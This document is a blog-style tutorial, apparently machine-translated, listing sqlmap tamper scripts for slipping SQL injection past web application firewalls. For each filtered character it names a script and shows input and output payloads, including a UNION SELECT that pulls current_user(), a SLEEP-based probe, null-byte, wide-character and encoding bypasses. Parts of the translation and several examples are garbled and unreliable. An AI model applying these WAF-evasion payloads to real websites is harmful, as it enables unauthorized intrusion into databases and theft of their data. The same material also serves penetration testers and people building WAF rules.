SQL injection tamper bypasses the WAF firewall

# # # Phenomenon:

When we injected, found that there are dogs, there is a waf, really my little heart is broken down!! However, many times still have to calm down to analyze the filter system exactly what parameters are filtered, how to bypass. Using the tamper in Sqlmap brings us a lot of anti-filtering script bypass.

Hint "The entry has a dangerous character and has been intercepted"

Tip "Please do not attempt to inject illegal characters in parameters"


# # # Judging us to use that script


1,id=1 Space Test Space
2,id=1%201=1 test equals
3,id=1%201=1 Select Test Select
......

# # # characters are filtered, using the PY

1, the space is filtered---->[space2commnet.py] ()

* Input:select ID from users
* output:select//id//from/**/users


The space is filtered----->[space2bash.py] ()

The space is filtered----->[space2morebash.py] ()----> #代替

The space is filtered----->[space2plus.py] ()------+ Replace

2, single quotes are filtered--->[apostrophemask.py] ()---->utf_8 instead of quotation marks

Double quote Bypass---->[apostrophenullencode.py] ()

Example:
Tamper ("1 and ' 1 ' = ' 1")
' 1 and%00%271%00%27=%00%271 '

3, the equals sign is filtered----->[equaltolike.py] ()------>like instead of equal sign

Example:
* Input:select * from users WHERE id=1
* Output:select * from the users WHERE ID like 1

4,> was filtered------>[greatest.py] ()--------> Replace with Greatest

Example:
(' 1 and A > B ')
' 1 and Greatest (a,b+1) =a '

------->[between.py] ()

Example:
(' 1 and A > b--')
' 1 and A not between 0 and b--'

5, double quotes, substitution characters and double quotes are filtered--->[apostrophenullencode.py] ()

Example:
("1 and ' 1 ' = ' 1")
' 1 and%00%271%00%27=%00%271 '

6, the database is MySQL when--->[halfversionedmorekeywords.py] ()



6, load 0-byte characters----->[appendnullbyte.py] ()

Example: (' 1 and 1=1 ') ' 1 and 1=1%00 '

URL Encoding conversion------>[charencode.py] ()

Example:
* Input:select FIELD from%20table
* Output:%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

String Unicode encoding Bypass--->[charunicodeencode.py] ()

Example:
* Input:select Field%20from TABLE
* output:%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046

Case-sensitive Conversion----->[randomcase.py] ()

Input:insert
Output:insert

Wide character Bypass---->[unmagicquotes.py] ()

Example:
* Input:1′and 1=1
* Output:1%bf%27 and 1=1–%20

With**/Split SQL keyword--->[randomcomments.py] ()

Example:
' INSERT ' becomes ' In//s//ert '

Keyword before add comment bypass---->[versionedmorekeywords.py] ()

Example:
* Input:1 UNION all SELECT null, NULL,
CONCAT (CHAR (58,122,114,115,58), Ifnull (CAST (Current_User () as
Char), char (+)), char (58,115,114,121,58)) #
* output:1/*! union**! all**! select**! null*/,/*! null*/,/*! concat*/(/*!) char*
/(58,122,114,115,58),/*! ifnull*/(CAST (/*! current_user*/()/*!as**! char*/),/*! char*/(32)),/*! char*/(58,115,114,121,58)) #

Bypass with Base64

Example:
("1 ' and SLEEP (5) #")
' mscgqu5eifnmruvqkdupiw== '

Here are two summary files that everyone needs to download.





Later will continue to add, there are errors or better, you can leave a message, we learn from each other!!

SQL injection tamper bypasses the WAF firewall